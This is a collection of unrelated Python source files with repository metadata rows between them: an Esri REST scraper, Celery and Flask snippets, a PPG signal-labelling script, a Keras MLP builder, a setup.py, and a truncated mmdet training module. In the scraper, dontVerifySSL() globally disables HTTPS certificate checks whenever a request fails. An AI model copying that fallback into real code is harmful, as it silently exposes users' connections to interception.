auto_test_dir = "../../data/DetKneeData/automatic_test299"
extract_detected_knees(raw_img_dir, det_result_dir, auto_test_dir)
| 35.509091 | 97 | 0.582181 |
ace07c67c0db059a0e49ea8743bb05f22d61c7ff | 18,009 | py | Python | RestCacheClass.py | mikepianka/EsriRESTScraper | 1058fccecb5a60e65d3c8cc4822dab7f7056ab24 | [
"MIT"
] | null | null | null | RestCacheClass.py | mikepianka/EsriRESTScraper | 1058fccecb5a60e65d3c8cc4822dab7f7056ab24 | [
"MIT"
] | null | null | null | RestCacheClass.py | mikepianka/EsriRESTScraper | 1058fccecb5a60e65d3c8cc4822dab7f7056ab24 | [
"MIT"
] | null | null | null | import os
import sys
import urllib2
import urllib
import re
import datetime
import httplib
import time
import json
import ssl
import logging
import ijson
import arcpy
########Exceptions################
class SchemaMismatch(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
class IncorrectWorkspaceType(SchemaMismatch):
pass
class TooManyRecords(SchemaMismatch):
pass
class MapServiceError(SchemaMismatch):
pass
class NullGeometryError(SchemaMismatch):
pass
########GENERAL FUNCTIONS#################
def getMultiGeometry(geometry):
"""Function to return an array with geometry from a multi-geometry object (polyline and polygon)
Returns a geometry object: polygon with multiple rings or polyline with multiple paths"""
geom = arcpy.Array()
for feature in geometry:
array = arcpy.Array()
for point in feature:
point = arcpy.Point(float(point[0]), float(point[1]))
array.add(point)
geom.add(array)
return geom
def validWorkspace(uri):
"""Function to check whether workspace is a geodatbase"""
if ".gdb" in str(uri) or ".sde" in str(uri):
return True
else:
return False
def getGeometryType(restGeom):
"""Return geometry type from REST endpoint geometry value"""
if "Polygon" in restGeom:
return "POLYGON"
elif "Polyline" in restGeom:
return "POLYLINE"
elif "Point" in restGeom:
return "POINT"
else:
return "Unknown"
def dontVerifySSL():
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default\
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
###############REST CACHE CLASS###########################
class RestCache:
def __init__(self, url, token=None, userFields=[], excludeFields=[]):
self.url = url
self.token = token
self.userFields = userFields
self.excludeFields = excludeFields
self.__setAttributes()
def __str__(self):
return "RestCache object based on %s" % self.url
def __getEsriRESTJSON(self, url, params, attempt=1, useIjson=False):
"""Helper function to query an Esri REST endpoint and return json"""
# Wait five seconds if previous error
if attempt > 1 and attempt != 6:
time.sleep(5)
# Set token if registered with object
if self.token != None:
params['token'] = self.token
# all other attempts...
if attempt <= 5:
data = urllib.urlencode(params)
req = urllib2.Request(url, data)
try:
response = urllib2.urlopen(req)
except httplib.BadStatusLine as e:
self.__logMsg(40, "Bad Status Line at attempt %n: %attempt")
return self.__getEsriRESTJSON(url, params, attempt + 1, useIjson=useIjson)
except urllib2.HTTPError as e:
self.__logMsg(40, "HTTP Error at attempt %n: sleeping" % attempt)
return self.__getEsriRESTJSON(url, params, attempt + 1, useIjson=useIjson)
except urllib2.URLError as e:
self.__logMsg(40, "Verify SSL Cert Error")
dontVerifySSL()
return self.__getEsriRESTJSON(url, params, attempt + 1, useIjson=useIjson)
if useIjson:
#need to figure out a way to deal with this if error is returned, possibly stop using ijson
return ijson.items(response, "features.item")
else:
final = json.loads(response.read())
if 'error' in final.keys():
self.__logMsg(40, "Error in json loads " + str(final))
return self.__getEsriRESTJSON(url, params, attempt + 1)
elif 'features' in final.keys():
return final['features']
else:
return final
else:
self.__logMsg(30, "Too many attempts")
raise MapServiceError("Error Accessing Map Service " + self.url)
# Function that sets the attributes of the RestCache object. All attributes are retrieved from the URL endpoint
# To do - M values and Z values
def __setUpdateFields(self, serviceFields):
"""Sets the fields that will be updated from the FeatureService. This does not include ID or Geometry fields"""
updateFields = []
for field in serviceFields:
if (field['type'] in ['esriFieldTypeOID', 'esriFieldTypeGeometry', 'esriFieldTypeGUID'] or 'shape' in field['name'].lower() or field['name'] in self.userFields + self.excludeFields):
pass
else:
updateFields.append(field)
updateFields.insert(
0, {"name": 'Shape@', "type": "esriFieldTypeGeometry"})
self.updateFields = updateFields
def __setAttributes(self):
"""Set attributes of object based on Esri REST Endpoint for FeatureService"""
values = {"f": "json"}
layerInfo = self.__getEsriRESTJSON(self.url, values)
# Geometry Type
geometryType = getGeometryType(layerInfo['geometryType'])
self.geometryType = geometryType
# Name
name = arcpy.ValidateTableName(layerInfo['name'])
self.name = name
# Spatial Reference - both the wkid and the arcpy SpatialReference object
# in case it's in a wkt
try:
wkid = layerInfo['extent']['spatialReference']['wkid']
except:
wkid = 4326
sr = arcpy.SpatialReference()
sr.factoryCode = int(wkid)
sr.create()
self.sr = sr
self.wkid = wkid
# field used to update the feature class are a subset of all the fields in a feature class
fields = layerInfo['fields']
self.__setUpdateFields(fields)
# Max values
if layerInfo.has_key('maxRecordCount'):
self.maxRecordCount = int(layerInfo['maxRecordCount'])
else:
self.maxRecordCount = 1000
def createFeatureClass(self, location, name="", excludeFields=[]):
"""Primary method to create a feature class based on an Esri
FeatureService REST endpoint"""
if not self.excludeFields:
self.excludeFields = excludeFields
self.updateFields = [
f for f in self.updateFields if f['name'] not in self.excludeFields]
if not validWorkspace(location):
raise IncorrectWorkspaceType(
"Incorrect workspace - feature class must be created in a local geodatabase")
if name != "":
self.name = name
self.featureClassLocation = location
featureset = arcpy.CreateFeatureclass_management(out_path=self.featureClassLocation,
out_name=self.name,
geometry_type=self.geometryType,
spatial_reference=self.sr)
self.__createFields()
return featureset
def recreateFeatureClass(self, target, userFields=[], excludeFields=[]):
"""Method to recreate target feature class by recreating fields from REST Endpoint
Can be invoked if SchemaMismatch error is thrown and caught"""
self.featureClassLocation, self.name = os.path.split(target)
existingFields = [f.name for f in arcpy.ListFields(target)]
fieldsToRemove = [x for x in existingFields if x not in userFields and "shape" not in x.lower(
) and "objectid" not in x.lower() and "oid" not in x.lower()]
arcpy.DeleteField_management(target, fieldsToRemove)
self.__createFields()
return target
def __createFields(self):
"""Helper function to create fields when running createFeatureClass method"""
for field in self.updateFields:
self.__createField(field)
def __createField(self, field):
"""Helper function to create individual field when running createFeatureClass method"""
name = field['name']
fType = field['type']
fieldLength = None
if 'shape' in name.lower():
return
elif "String" in fType:
fieldType = "TEXT"
fieldLength = field['length']
elif "Date" in fType:
fieldType = "DATE"
elif "SmallInteger" in fType:
fieldType = "SHORT"
elif "Integer" in fType:
fieldType = "LONG"
elif "Double" in fType:
fieldType = "DOUBLE"
elif "Single" in fType:
fieldType = "FLOAT"
else:
fieldType = "Unknown"
featureClass = self.featureClassLocation + "\\" + self.name
validatedName = arcpy.ValidateFieldName(
name, self.featureClassLocation)
arcpy.AddField_management(
in_table=featureClass, field_name=name, field_type=fieldType, field_length=fieldLength)
def __configDebug(self, debug, debugLoc):
"""Allows user to write some progess indicators to a log file"""
if debug:
self.debugMode = True
module = os.path.basename(sys.argv[0])
if module == '':
module = 'restcache{}.log'.format(str(datetime.datetime.now()))
else:
module = module.replace(".py", ".log")
logging.basicConfig(filename=os.path.join(debugLoc, module), level=logging.INFO)
logging.log(20, "Starting script at %s" %datetime.datetime.now())
else:
self.debugMode = False
def __logMsg(self, level, *messages):
"""Handles logging"""
if self.debugMode:
for message in messages:
print "{}: {}".format(logging.getLevelName(level), message)
logging.log(level, message)
def updateFeatureClass(self, featureClass, query=["1=1"], append=False, userFields=[], excludeFields=[], debug=False, debugLoc=sys.path[0]):
"""Primary method to update an existing feature class by scraping Esri's REST endpoints.
Method iterates over queries so user can specify non-overlapping queries to break up
ingestion. Method checks that the schemas of the source and destination match,
ignoring fields in userFields paramter"""
#config debug mode or not
self.__configDebug(debug, debugLoc)
# check if user fileds already exist
if not self.userFields:
self.userFields = userFields
if not self.excludeFields:
self.excludeFields = excludeFields
# check for errors
if not validWorkspace(featureClass):
raise IncorrectWorkspaceType(
"Incorrect workspace - feature class must be created in a local geodatabase")
if not self.__matchSchema(featureClass):
raise SchemaMismatch("Schema of input feature class does not match object schema")
queries = self.__generateQuery(query)
cursor = None
# iterate over queries
for query in queries:
self.__logMsg(20, "Working on %s" % query)
recordsInQuery = self.__getNumRecordsFromQuery(query)
if recordsInQuery == 0:
self.__logMsg(30, 'Skipping query')
continue
elif self.__numRecordsMoreThanMax(recordsInQuery):
del cursor
raise TooManyRecords("Query returns more than max allowed. Please refine query: " + query)
# else do the rest
rValues = {"where": query,
"f": "json",
"returnCountOnly": "false",
"outFields": "*"}
featureData = self.__getEsriRESTJSON(self.url + "/query", rValues, useIjson=False)
#maybe - unless ijson was used and query was bad
self.__logMsg(20, "Successfully returned data")
# Append or overwrite mode - prevents deletion if service is unavailable
if all([not append, not cursor]):
self.__logMsg(20, "Deleting records")
arcpy.DeleteFeatures_management(featureClass)
# instantiate cursor - if there is already a cursor, do nothing
if not cursor:
self.__logMsg(20, "Instantiating cursor")
updateFields = [f['name'] for f in self.updateFields]
cursor = arcpy.da.InsertCursor(featureClass, updateFields)
for feature in featureData:
# if geometry is bad, skip record
try:
geom = self.__getGeometry(feature['geometry'])
except NullGeometryError as e:
self.__logMsg(30, "Null geometry error")
continue
except:
self.__logMsg(30, "Some other geometry error - couldn't get geometry")
continue
attributes = []
attributes.append(geom)
for field in self.updateFields:
if field['name'] == "Shape@":
continue
else:
attributes.append(self.__getFieldFromFeature(feature, field))
cursor.insertRow(attributes)
self.__logMsg(20, "Finished writing data for query: %s" % query)
# Delete cursor
del cursor
def __getFieldFromFeature(self, feature, field):
if 'date' in field['type'].lower():
return self.__handleDateAttribute(feature['attributes'][field['name']])
else:
"""getting strange OverflowError Python int too large to convert to C long,
so casting section getting problem with some services where some fields
aren't returned in results so added try/catch block"""
try:
newAttribute = feature['attributes'][field['name']]
if type(newAttribute) is long:
self.__logMsg(20, "Attribute is of type long")
if type(int(newAttribute)) is long:
return float(newAttribute)
else:
return newAttribute
else:
return newAttribute
except KeyError, e:
self.__logMsg(40, "Key error in attributes")
return None
def __generateQuery(self, query):
"""Generates array of queries to send to endpoint from the function paramater"""
if query == None:
return ["1=1"]
elif type(query) is not list:
return [query]
else:
return query
# Function to handle a date attribute (often passed as a UNIX timestamp)
def __handleDateAttribute(self, timeString):
"""Based on length of Unix time string, returns the correct date"""
try:
if len(str(timeString)) == 13:
return datetime.datetime.fromtimestamp(timeString / 1000)
else:
return datetime.datetime.fromtimestamp(timeString)
except ValueError:
return None
except TypeError:
return None
def __matchSchema(self, featureClass):
"""Matches schema of featureClass to the RestCache object so updating can continue"""
fClassFields = []
for field in arcpy.ListFields(featureClass):
fieldName = field.name.lower()
if fieldName == 'objectid' or fieldName == 'oid' or 'shape' in fieldName or field.name in self.userFields:
pass
else:
fClassFields.append(field.name)
fClassFields.insert(0, 'Shape@')
objFields = [f['name'] for f in self.updateFields]
if sorted(fClassFields) == sorted(objFields):
return True
else:
nonFields = [fname for fname in objFields if not fname in fClassFields]
self.__logMsg(40, "Schema of input feature class does not match object schema", "Fields not in feature class but in feature service",str(nonFields))
return False
def __numRecordsMoreThanMax(self, numRecords):
"""Check record count is less than the maximum possible to prevent an incomplete cache"""
return numRecords > self.maxRecordCount
def __getNumRecordsFromQuery(self, query="1=1"):
"""Return number of records from REST endpoint based on query"""
self.__logMsg(20,"Checking number of records in query")
rValues = {"where": query, "f": "json", "returnCountOnly": "true"}
count = self.__getEsriRESTJSON(self.url + "/query", rValues)
numRecords = count['count']
self.__logMsg(20,"Query contains %d records" % numRecords)
return numRecords
def __getGeometry(self, geom):
"""Function to return the Arcpy geometry type to be inserted in the update list"""
if "POLYGON" in self.geometryType:
rings = geom['rings']
polygon = getMultiGeometry(rings)
polyGeom = arcpy.Polygon(polygon, self.sr)
return polyGeom
elif "POLYLINE" in self.geometryType:
paths = geom['paths']
polyline = getMultiGeometry(paths)
lineGeom = arcpy.Polyline(polyline, self.sr)
return lineGeom
elif "POINT" in self.geometryType:
try:
point = arcpy.Point(float(geom['x']), float(geom['y']))
except:
raise NullGeometryError("Point geometry is invalid or null")
pointGeom = arcpy.Geometry("point", point, self.sr)
return pointGeom
| 42.374118 | 194 | 0.597812 |
ace07cc39207013795311a5f0f3e65d89975286c | 1,685 | py | Python | src/bitcaster/celery.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 4 | 2018-03-01T10:22:30.000Z | 2020-04-04T16:31:11.000Z | src/bitcaster/celery.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 60 | 2018-05-20T04:42:32.000Z | 2022-02-10T17:03:37.000Z | src/bitcaster/celery.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 1 | 2018-08-04T05:06:45.000Z | 2018-08-04T05:06:45.000Z | import os
import celery
from celery.apps.worker import Worker
from celery.signals import celeryd_after_setup
from django.conf import settings
from bitcaster.config.environ import env
from bitcaster.state import state
class BitcasterCelery(celery.Celery):
task_cls = 'bitcaster.celery:BitcasterTask'
# class TaskRouter:
# def route_for_task(self, task, *args, **kwargs):
# if ':' not in task:
# return {'queue': 'celery'}
# namespace, _ = task.split(':')
# return {'queue': namespace}
class BitcasterTask(celery.Task):
def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, link=None, link_error=None, shadow=None,
**options):
return super().apply_async(args, kwargs, task_id, producer, link, link_error, shadow, **options)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bitcaster.config.settings')
app = BitcasterCelery('bitcaster',
loglevel='error',
broker=env.str('CELERY_BROKER_URL'))
app.config_from_object('django.conf:settings', namespace='CELERY', force=True)
app.conf.ONCE = {
'backend': 'celery_once.backends.Redis',
'settings': {
'url': settings.CACHES['lock']['LOCATION'],
'default_timeout': 60 * 60
}
}
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
app.autodiscover_tasks(lambda: ['bitcaster'])
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request))
@celeryd_after_setup.connect
def setup_state(instance: Worker, conf, **kwargs):
from bitcaster.models import Organization
state.data['organization'] = Organization.objects.first()
| 28.559322 | 119 | 0.687834 |
ace07cf6c1d3ad5833a7ffb0ca58568344b485aa | 1,798 | py | Python | sampledb/frontend/markdown_images.py | nilsholle/sampledb | 90d7487a3990995ca2ec5dfd8b59d4739d6a9a87 | [
"MIT"
] | 5 | 2020-02-13T15:25:37.000Z | 2021-05-06T21:05:14.000Z | sampledb/frontend/markdown_images.py | nilsholle/sampledb | 90d7487a3990995ca2ec5dfd8b59d4739d6a9a87 | [
"MIT"
] | 28 | 2019-11-12T14:14:08.000Z | 2022-03-11T16:29:27.000Z | sampledb/frontend/markdown_images.py | nilsholle/sampledb | 90d7487a3990995ca2ec5dfd8b59d4739d6a9a87 | [
"MIT"
] | 8 | 2019-12-10T15:46:02.000Z | 2021-11-02T12:24:52.000Z | # coding: utf-8
"""
There are several Markdown editors built into the SampleDB frontend, which
need to be able to upload images. This module allows uploading images which
are then assigned a random file name and can be used in the Markdown editors
using that name.
"""
import base64
import os
import flask
import flask_login
from . import frontend
from ..logic import markdown_images
_temporary_markdown_images = {}
IMAGE_FORMATS = {
'.png': 'image/png',
'.jpg': 'image/jpeg',
'.jpeg': 'image/jpeg',
}
@frontend.route('/markdown_images/<file_name>')
@flask_login.login_required
def markdown_image(file_name):
image_data = markdown_images.get_markdown_image(file_name, flask_login.current_user.id)
if image_data is None:
return flask.abort(404)
file_extension = os.path.splitext(file_name)[1]
return flask.Response(
image_data,
mimetype=IMAGE_FORMATS.get(file_extension, 'application/octet-stream')
)
@frontend.route('/markdown_images/', methods=['POST'])
@flask_login.login_required
def upload_markdown_image():
image_data_url = flask.request.get_data()
for image_file_extension, image_content_type in IMAGE_FORMATS.items():
image_data_url_prefix = b'data:' + image_content_type.encode('ascii') + b';base64,'
if image_data_url.startswith(image_data_url_prefix):
image_base64_data = image_data_url[len(image_data_url_prefix):]
break
else:
return flask.abort(400)
try:
image_data = base64.b64decode(image_base64_data)
except Exception:
return flask.abort(400)
file_name = markdown_images.store_temporary_markdown_image(image_data, image_file_extension, flask_login.current_user.id)
return flask.url_for('.markdown_image', file_name=file_name)
| 31.54386 | 125 | 0.735818 |
ace07e1e1a1e54556eef076d957ba33761f9a769 | 6,101 | py | Python | label_data.py | get/PPG-Pattern-Recognition | 3c2200ad4d914af0b52ae330f0d6bf66dfb64a5c | [
"MIT"
] | 9 | 2017-10-26T08:20:57.000Z | 2019-06-02T14:18:19.000Z | label_data.py | get/PPG-Pattern-Recognition | 3c2200ad4d914af0b52ae330f0d6bf66dfb64a5c | [
"MIT"
] | null | null | null | label_data.py | get/PPG-Pattern-Recognition | 3c2200ad4d914af0b52ae330f0d6bf66dfb64a5c | [
"MIT"
] | 4 | 2017-07-18T09:49:56.000Z | 2019-01-15T02:04:01.000Z | # Script used to label the dataset files (data/data*.csv), call using the -h
# option for information.
# The program extracts preliminary features from the data, then sorts the
# results by feature importance and plots them in batches. Segments can be
# labeled by clicking on subplots.
import sys
import numpy as np
import pandas as pd
import argparse
from datetime import datetime
import glob
sys.path.append('lib')
import detect_peaks
from sklearn import preprocessing
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.patches import Rectangle
from peakutils.peak import indexes
from classes.Signal import Signal
from classes.DataSource import DataSource
# Parse arugments
data_file_id_choices = list(range(len(glob.glob("data/data*.csv"))))
parser = argparse.ArgumentParser(description='Label the dataset for training. \
A call should supply a data file index (e.g. 0 for ./data/data0.csv) and the label \
type (+/-). Figures of signal segment plots will be displayed, ordered by features that \
correlate with high signal to noise ratio. Labels for each signal segment \
are generated by clicking on the respective plot. The file ID, start, and end \
indices of the segment will be appended as a single new line in \
positive_ranges.csv or negative_ranges.csv, depending on the supplied label type.')
parser.add_argument('--file_id', type=int, default=20, required=True,
choices=data_file_id_choices,
help='data file index (e.g. 0 for ./data/data0.csv)')
parser.add_argument('--label_type', type=str, default="+", required=True,
choices=["+","-","positive","negative"],
help='e.g. +/-/positive/negative')
args = parser.parse_args()
FILE_ID = args.file_id
LABEL_TYPE = args.label_type
LABEL_TYPE = LABEL_TYPE.replace("+", "positive").replace("-", "negative")
# Helper functions
def onclick(event):
fx, fy = fig.transFigure.inverted().transform((event.x,event.y))
for i, subplot in enumerate(subplots):
if subplot["pos"].contains(fx,fy) and subplot["used"] == False:
range_ids = pd.DataFrame([subplot["range"]])
range_ids.to_csv('data/%s_ranges.csv' % LABEL_TYPE,
mode='a', header=False, index=False)
subplots[i]["used"] = True
fig.text(np.mean([subplot["pos"].x1,subplot["pos"].x0])-0.01,
np.mean([subplot["pos"].y1,subplot["pos"].y0]),
'Labeled %s' % LABEL_TYPE,
horizontalalignment='center',
verticalalignment='center',
color="green",
backgroundcolor="white",
fontsize=14)
fig.canvas.draw()
break
ds = DataSource()
dataset = ds.read_data_from_file(FILE_ID)
labeled_ds_pos = pd.read_csv('data/positive_ranges.csv',
header=None,
names=["file_id", "start", "end"])
labeled_ds_neg = pd.read_csv('data/negative_ranges.csv',
header=None,
names=["file_id", "start", "end"])
step = 256
offset = 0
start, end = offset, dataset.shape[0]
features = []
while start+step < end:
signal = Signal(dataset.iloc[start:start+step].ppg.values,
dataset.iloc[start:start+step].timestamp.values)
feature_vector = signal.extract_features(validate_HR_range = (True if LABEL_TYPE=="positive" else False))
if feature_vector != None:
features.append(feature_vector + [signal,start,start+step])
start += step
# Sort by features in ascending order, in order of feature importance
columns = ["mean_HF", "HF/LF", "VLF/LF", "peak_var", "signal", "start", "end"]
sort_column_order = [columns[i] for i in [2,1,3,0]]
features = pd.DataFrame(features, columns=columns).sort_values(sort_column_order, ascending=True)
num_figure_subplots = 30
counter = 0
k = 0
while num_figure_subplots*k < features.shape[0] and k < 100:
fig = plt.figure(k+1, figsize=(15, 10))
subplots = []
for i in range(num_figure_subplots):
feat = features.iloc[num_figure_subplots*k+i]
signal = feat.signal
start = feat.start
end = feat.end
signal = preprocessing.scale(signal.highpass_filter(1))
signal_filtered = preprocessing.scale(signal.bandpass_filter(0.8, 2.5))
start_time = pd.Timestamp(signal.timestamp_in_datetime(0))
end_time = pd.Timestamp(signal.timestamp_in_datetime(-1))
t = np.linspace(start_time.value, end_time.value, step)
t = pd.to_datetime(t)
ax = plt.subplot(num_figure_subplots/3,3,i+1)
alpha = 1
used = False
label = None
if labeled_ds_pos.isin([FILE_ID, start, end]).all(1).any():
label = "+"
if labeled_ds_neg.isin([FILE_ID, start, end]).all(1).any():
label = "-"
if label != None:
alpha = 0.35
ax.text(0.5, 0.5,'Already labeled %s' % label,
horizontalalignment='center',
verticalalignment='center',
transform=ax.transAxes,
fontsize=14)
used = True
subplots.append({"pos":ax.get_position(),
"range":[FILE_ID, start, end],
"used":used,
"figure_id":k+1})
ax.plot(t, preprocessing.scale(signal), alpha=alpha)
ax.plot(t, preprocessing.scale(signal_filtered), color='r', alpha=alpha)
ax.xaxis_date()
ax.xaxis.set_major_formatter(mdates.DateFormatter('%H:%M:%S'))
ax.yaxis.set_visible(False)
cid = fig.canvas.mpl_connect('button_press_event', onclick)
figManager = plt.get_current_fig_manager()
try:
figManager.window.showMaximized()
except:
try:
figManager.full_screen_toggle()
except:
try:
figManager.window.state('zoomed')
except:
pass
plt.show()
counter += num_figure_subplots
k += 1
| 38.371069 | 109 | 0.627438 |
ace07e330acf3a1c770bc1112a27284e2d2e8eef | 6,733 | py | Python | gnn2/MLP.py | vishalbelsare/GNN_tf_2.x | 4b6429ed58f2c0922257600a9287d5cc5a10395b | [
"BSD-3-Clause"
] | 3 | 2021-04-09T08:45:04.000Z | 2021-12-06T12:00:18.000Z | gnn2/MLP.py | vishalbelsare/GNN_tf_2.x | 4b6429ed58f2c0922257600a9287d5cc5a10395b | [
"BSD-3-Clause"
] | null | null | null | gnn2/MLP.py | vishalbelsare/GNN_tf_2.x | 4b6429ed58f2c0922257600a9287d5cc5a10395b | [
"BSD-3-Clause"
] | 2 | 2020-11-23T09:57:00.000Z | 2021-03-24T05:37:13.000Z | from __future__ import annotations
from typing import Union, Optional
from numpy import array, arange
from tensorflow.keras.layers import Dense, Dropout, AlphaDropout, BatchNormalization
from tensorflow.keras.models import Sequential
# ---------------------------------------------------------------------------------------------------------------------
def MLP(input_dim: int, layers: list[int], activations, kernel_initializer, bias_initializer,
kernel_regularizer=None, bias_regularizer=None, dropout_rate: Union[list[float], float, None] = None,
dropout_pos: Optional[Union[list[int], int]] = None, alphadropout: bool = False, batch_normalization: bool = True):
""" Quick building function for MLP model. All lists must have the same length
:param input_dim: (int) specify the input dimension for the model
:param layers: (int or list of int) specify the number of units in every layers
:param activations: (functions or list of functions)
:param kernel_initializer: (initializers or list of initializers) for weights initialization (NOT biases)
:param bias_initializer: (initializers or list of initializers) for biases initialization (NOT weights)
:param kernel_regularizer: (regularizer or list of regularizers) for weight regularization (NOT biases)
:param bias_regularizer: (regularizer or list of regularizers) for biases regularization (NOT weights)
:param dropout_rate: (float) s.t. 0 <= dropout_percs <= 1 for dropout rate
:param dropout_pos: int or list of int describing dropout layers position
:param alphadropout: (bool) for dropout type, if any
:param batch_normalization: (bool) add a BatchNormalization layer after the last dense layer
:return: Sequential (MLP) model
"""
# check type
if dropout_rate == None or dropout_pos == None: dropout_rate, dropout_pos = list(), list()
# build lists
if type(activations) != list: activations = [activations for _ in layers]
if type(kernel_initializer) != list: kernel_initializer = [kernel_initializer for _ in layers]
if type(bias_initializer) != list: bias_initializer = [bias_initializer for _ in layers]
if type(kernel_regularizer) != list: kernel_regularizer = [kernel_regularizer for _ in layers]
if type(bias_regularizer) != list: bias_regularizer = [bias_regularizer for _ in layers]
if type(dropout_pos) == int: dropout_pos = [dropout_pos]
if type(dropout_rate) == float: dropout_rate = [dropout_rate for _ in dropout_pos]
# check lengths
if len(set(map(len, [activations, kernel_initializer, bias_initializer, kernel_regularizer, bias_regularizer, layers]))) > 1:
raise ValueError('Dense parameters must have the same length to be correctly processed')
if len(dropout_rate) != len(dropout_pos):
raise ValueError('Dropout parameters must have the same length to be correctly processed')
# Dense layers
keys = ['units', 'activation', 'kernel_initializer', 'bias_initializer', 'kernel_regularizer', 'bias_regularizer']
vals = zip(layers, activations, kernel_initializer, bias_initializer, kernel_regularizer, bias_regularizer)
params = [dict(zip(keys, i)) for i in vals]
# Dropout layers
if dropout_rate and dropout_pos:
dropout_pos = list(array(dropout_pos) + arange(len(dropout_pos)))
for i, elem in enumerate(dropout_rate): params.insert(dropout_pos[i], {'rate': elem})
# set input shape for first layer
params[0]['input_shape'] = (input_dim,)
# return MLP model
dropout = AlphaDropout if alphadropout else Dropout
mlp_layers = [Dense(**i) if 'units' in i else dropout(**i) for i in params]
if batch_normalization: mlp_layers += [BatchNormalization()]
return Sequential(mlp_layers)
# ---------------------------------------------------------------------------------------------------------------------
def get_inout_dims(net_name: str, dim_node_label: int, dim_arc_label: int, dim_target: int, problem_based: str, dim_state: int,
hidden_units: Union[None, int, list[int]],
*, layer: int = 0, get_state: bool = False, get_output: bool = False) -> tuple[int, list[int]]:
""" Calculate input and output dimension for the MLP of state and output
:param net_name: (str) in ['state','output']
:param dim_node_label: (int) dimension of node label
:param dim_arc_label: (int) dimension of arc label
:param dim_target: (int) dimension of target
:param problem_based: (str) s.t. len(problem_based) in [1,2] -> [{'a','n','g'} | {'1','2'}]
:param dim_state: (int)>=0 for state dimension paramenter of the gnn
:param hidden_units: (int or list of int) for specifying units on hidden layers
:param layer: (int) LGNN USE: get the dims at gnn of the layer <layer>, from graph dims on layer 0. Default is 0, since GNN==LGNN in this case
:param get_state: (bool) LGNN USE: set accordingly to LGNN behaviour, if gnns get state, output or both from previous layer
:param get_output: (bool) LGNN USE: set accordingly to LGNN behaviour, if gnns get state, output or both from previous layer
:return: (tuple) (input_shape, layers) s.t. input_shape (int) is the input shape for mlp, layers (list of ints) defines hidden+output layers
"""
assert layer >= 0
assert problem_based in ['a', 'n', 'g']
assert dim_state >= 0
DS = dim_state
NL, AL, T = dim_node_label, dim_arc_label, dim_target
# if LGNN, get MLPs layers for gnn in layer 2+
if layer > 0:
GS, GO = get_state, get_output
if DS != 0:
NL = NL + DS * GS + T * (problem_based != 'a') * GO
AL = AL + T * (problem_based == 'a') * GO
else:
NL = NL + layer * NL * GS + ((layer - 1) * GS + 1) * T * (problem_based != 'a') * GO
AL = AL + T * (problem_based == 'a') * GO
# MLP state
if net_name == 'state':
input_shape = AL + 2 * (NL + DS)
output_shape = DS if DS else NL
# MLP output
elif net_name == 'output':
input_shape = (problem_based == 'a') * (NL + AL + DS) + NL + dim_state
output_shape = T
# possible values for net_name in ['state','output'], otherwise raise error
else:
raise ValueError(':param net_name: not in [\'state\', \'output\']')
# hidden part
if hidden_units is None or type(hidden_units) == int and hidden_units <= 0: hidden_units = []
if type(hidden_units) == list:
layers = hidden_units + [output_shape]
else:
layers = [hidden_units, output_shape]
return input_shape, layers
| 54.739837 | 147 | 0.651418 |
ace07ee0437215235a9fa11693eb2f210ab3b5aa | 1,396 | py | Python | setup.py | nizamarusada/python-mailchimp | e67ba19848d1975d2b142fab960633fc3df8dff4 | [
"MIT"
] | null | null | null | setup.py | nizamarusada/python-mailchimp | e67ba19848d1975d2b142fab960633fc3df8dff4 | [
"MIT"
] | null | null | null | setup.py | nizamarusada/python-mailchimp | e67ba19848d1975d2b142fab960633fc3df8dff4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
README = os.path.join(os.path.dirname(__file__), 'README.rst')
# When running tests using tox, README.md is not found
try:
with open(README) as file:
long_description = file.read()
except Exception:
long_description = ''
setup(
name='mailchimp3',
version='3.0.6',
description='A python client for v3 of MailChimp API',
long_description=long_description,
url='https://github.com/charlesthk/python-mailchimp',
author='Charles TISSIER',
author_email='charles@vingtcinq.io',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.6',
],
keywords='mailchimp api v3 client wrapper',
packages=find_packages(),
install_requires=['requests>=2.7.0'],
# test_suite='tests',
)
| 31.727273 | 71 | 0.637536 |
ace0800c5470fbcdd36a04d2322d618354aa9f67 | 3,978 | py | Python | mmdet/apis/train.py | Qianna00/InstanceLoc | de6bf95f482c04f3b9af4434feff6a38646e0a87 | [
"Apache-2.0"
] | null | null | null | mmdet/apis/train.py | Qianna00/InstanceLoc | de6bf95f482c04f3b9af4434feff6a38646e0a87 | [
"Apache-2.0"
] | null | null | null | mmdet/apis/train.py | Qianna00/InstanceLoc | de6bf95f482c04f3b9af4434feff6a38646e0a87 | [
"Apache-2.0"
] | null | null | null | import random
import numpy as np
import torch
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.runner import (DistSamplerSeedHook, EpochBasedRunner, OptimizerHook,
build_optimizer)
from mmdet.core import DistEvalHook, EvalHook
from mmdet.datasets import build_dataloader, build_dataset
from mmdet.utils import get_root_logger
def set_random_seed(seed, deterministic=False):
"""Set random seed.
Args:
seed (int): Seed to be used.
deterministic (bool): Whether to set the deterministic option for
CUDNN backend, i.e., set `torch.backends.cudnn.deterministic`
to True and `torch.backends.cudnn.benchmark` to False.
Default: False.
"""
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
if deterministic:
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def train_detector(model,
